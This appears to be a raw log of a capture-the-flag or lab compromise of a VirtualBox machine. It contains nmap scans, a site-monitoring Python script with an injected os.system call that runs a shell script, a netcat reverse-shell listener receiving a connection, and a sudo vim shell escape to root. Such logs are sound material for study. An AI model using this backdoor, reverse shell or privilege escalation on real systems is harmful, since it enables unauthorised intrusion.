Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:25 CST
Nmap scan report for 192.168.0.1
Host is up (0.00040s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.012s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.101
Host is up (0.014s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.00020s latency).
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up (0.014s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.109
Host is up (0.0016s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.105
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 1.93 seconds
$ sudo nmap -sV -sC -A 192.168.0.103
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:26 CST
Nmap scan report for 192.168.0.103
Host is up (0.00021s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1   0.21 ms 192.168.0.103
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds
Site is Up: 24/03/2022 15:20:01
Site is Up: 24/03/2022 15:22:02
Site is Up: 24/03/2022 15:24:01
Site is Up: 24/03/2022 15:26:01
Site is Up: 24/03/2022 15:28:01
Site is Up: 24/03/2022 15:30:01
Site is Up: 26/03/2022 11:26:11
Site is Up: 26/03/2022 11:28:01
Site is Up: 26/03/2022 11:30:01
Site is Up: 26/03/2022 11:32:01
Site is Up: 26/03/2022 11:34:01
Site is Up: 26/03/2022 11:36:02
Site is Up: 26/03/2022 11:38:01
Site is Up: 26/03/2022 11:40:01
Site is Up: 26/03/2022 11:42:01
Site is Up: 26/03/2022 11:44:01
Site is Up: 26/03/2022 11:46:02
Site is Up: 26/03/2022 11:48:01
Site is Up: 26/03/2022 11:50:01
Site is Up: 26/03/2022 11:52:01
Site is Up: 26/03/2022 11:54:01
Site is Up: 26/03/2022 11:56:02
Site is Up: 26/03/2022 11:58:01
from datetime import datetime
import requests
import os

now = datetime.now()

# Runs /dev/shm/shell.sh with bash every time this script executes.
os.system('/usr/bin/bash /dev/shm/shell.sh')

# Append a timestamped status line based on the local site's HTTP response.
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt", "a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt", "a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
nc -lvp 2333
listening on [any] 2333 ...
192.168.0.103: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.103] 37988
sh: 0: can't access tty; job control turned off
$ sudo -l
Matching Defaults entries for adrian on napping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on napping:
(root) NOPASSWD: /usr/bin/vim
$
$ sudo /usr/bin/vim -c ':!/bin/sh'
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
builtin_amiga
builtin_beos-ansi
builtin_ansi
builtin_pcansi
builtin_win32
builtin_vt320
builtin_vt52
builtin_xterm
builtin_iris-ansi
builtin_debug
builtin_dumb
defaulting to 'ansi'
:!/bin/sh
ls
query.py
site_status.txt
user.txt
whoami
root
cd /root
ls
del_links.py
del_users.py
nap.py
root.txt
snap
cat root.txt
Admins just can't stay awake tsk tsk tsk